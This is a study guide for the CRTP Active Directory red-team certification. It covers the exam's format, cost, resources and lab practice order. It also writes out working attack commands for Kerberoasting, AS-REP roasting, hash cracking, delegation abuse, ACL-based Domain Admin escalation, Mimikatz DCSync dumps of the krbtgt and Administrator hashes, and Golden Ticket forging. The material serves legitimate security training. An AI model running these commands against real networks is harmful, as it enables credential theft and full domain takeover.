The Certified Red Team Professional (CRTP) is a highly respected, fully hands-on Active Directory security certification from Altered Security (formerly Pentester Academy). It focuses entirely on attacking Windows enterprise environments — specifically Active Directory — and is widely regarded as one of the most practical certifications available for aspiring red teamers. This guide covers what the exam entails, the key attack techniques you need to master, and how to prepare.
What Is CRTP?
CRTP tests your ability to compromise an Active Directory environment from initial access to domain dominance. The exam is a 24-hour hands-on lab where you attack a multi-machine AD forest and answer questions based on flags you capture along the way.
The exam covers:
- Active Directory enumeration with PowerView and BloodHound
- Local privilege escalation on Windows hosts
- Lateral movement techniques
- Domain privilege escalation (Kerberoasting, AS-REP roasting, ACL abuse, delegation attacks)
- Cross-domain attacks (forest trusts, SID history abuse)
- Persistence (Golden Tickets, Silver Tickets, skeleton keys, DSRM abuse)
The course and lab environment costs around $299 USD for 30-day access, with a 48-hour lab extension for the exam. A passing score requires completing 80% of the exam objectives.
The Course: Attacking and Defending Active Directory
The official course covers these major topic areas:
AD Enumeration with PowerView
PowerView is a PowerShell framework for Active Directory reconnaissance that doesn’t require elevated privileges:
# Import PowerView
. .\PowerView.ps1
# Get domain information
Get-Domain
Get-DomainController
# Enumerate users
Get-DomainUser | select samaccountname, description
# Find admin users
Get-DomainGroupMember "Domain Admins"
# Find computers
Get-DomainComputer | select name, operatingsystem
# Find SPNs for Kerberoasting
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
BloodHound for Attack Path Analysis
BloodHound graphically maps AD permissions and finds shortest attack paths to Domain Admin:
# Collect AD data with SharpHound
.\SharpHound.exe -c all --outputdirectory C:\temp\
# Or using the PowerShell version
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp\
Import the ZIP into BloodHound and use built-in queries:
- “Find Shortest Paths to Domain Admins”
- “Find Principals with DCSync Rights”
- “Shortest Paths to Unconstrained Delegation Systems”
BloodHound often reveals non-obvious attack paths that manual enumeration misses entirely.
Kerberoasting and AS-REP Roasting
Kerberoasting targets service accounts with SPNs:
# With PowerView
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv tickets.csv
# Or with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
AS-REP roasting targets accounts without pre-authentication:
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
Crack both with Hashcat:
# Kerberoasting (mode 13100)
hashcat -m 13100 hashes.txt rockyou.txt
# AS-REP (mode 18200)
hashcat -m 18200 asrep_hashes.txt rockyou.txt
ACL Abuse
One of CRTP’s core topics is abusing Active Directory Access Control Lists. Common exploitable rights:
| Right | Abuse |
|---|
| GenericAll | Full control — reset password, add to group |
| GenericWrite | Write attributes — set SPN for targeted Kerberoasting |
| WriteDACL | Add your own ACL entries |
| WriteOwner | Take ownership, then WriteDACL |
| ForceChangePassword | Change password without knowing current |
Example: If user jsmith has GenericAll over Domain Admins, use PowerView to add them:
Add-DomainGroupMember -Identity "Domain Admins" -Members jsmith
Delegation Attacks
Unconstrained delegation — machines with this flag set cache TGTs of any user who authenticates. If you compromise such a machine:
# Find unconstrained delegation computers
Get-DomainComputer -Unconstrained | select name
# Use Rubeus to monitor and extract TGTs
.\Rubeus.exe monitor /interval:5 /nowrap
Constrained delegation with Protocol Transition — allows impersonating any user to specific services:
# S4U2Self + S4U2Proxy to get a service ticket as Administrator
.\Rubeus.exe s4u /user:serviceaccount /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /ptt
Resource-based Constrained Delegation (RBCD) — if you have write access to a computer object’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, you can configure delegation to allow your controlled computer to impersonate any user to that target.
Domain Persistence
Once you achieve Domain Admin:
Golden Ticket — forge TGTs using the KRBTGT hash:
# Get KRBTGT hash
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
# Forge Golden Ticket
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt"'
Silver Ticket — forge a service ticket for a specific service using the machine account hash. More covert than Golden Tickets.
DCSync — pull any account’s hash without logging on to the DC:
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
Cross-Forest Attacks
With Enterprise Admin or appropriate trust relationships, attack across forest trusts using SID history injection and foreign principal abuse.
Study Resources
- Official CRTP course — alteredsecurity.com — the primary resource
- Hack The Box Pro Labs (RastaLabs, Offshore) — challenging AD environments for practice
- VulnLab — realistic AD labs purpose-built for red team practice
- TryHackMe — “Post-Exploitation Basics” and “Active Directory Basics” paths
- S1ren’s AD Attack notes — excellent community-written notes freely available on GitHub
- The Hacker Recipes — thehacker.recipes — comprehensive AD attack reference
Recommended Lab Practice Order
- Set up a basic AD lab locally (Windows Server 2022 DC + 2 Windows 10 workstations)
- Enumerate with PowerView until you can do it from memory
- Practice Kerberoasting and AS-REP roasting
- Practice ACL abuse using BloodHound to identify paths
- Practice delegation attacks (unconstrained → constrained → RBCD)
- Practice DCSync and Golden Ticket persistence
- Complete the CRTP course labs end-to-end
CRTP is a challenging but fair exam that rewards candidates who have truly practiced these techniques rather than just reading about them. Completing it prepares you directly for CRTE (Certified Red Team Expert) and significantly strengthens your readiness for OSCP.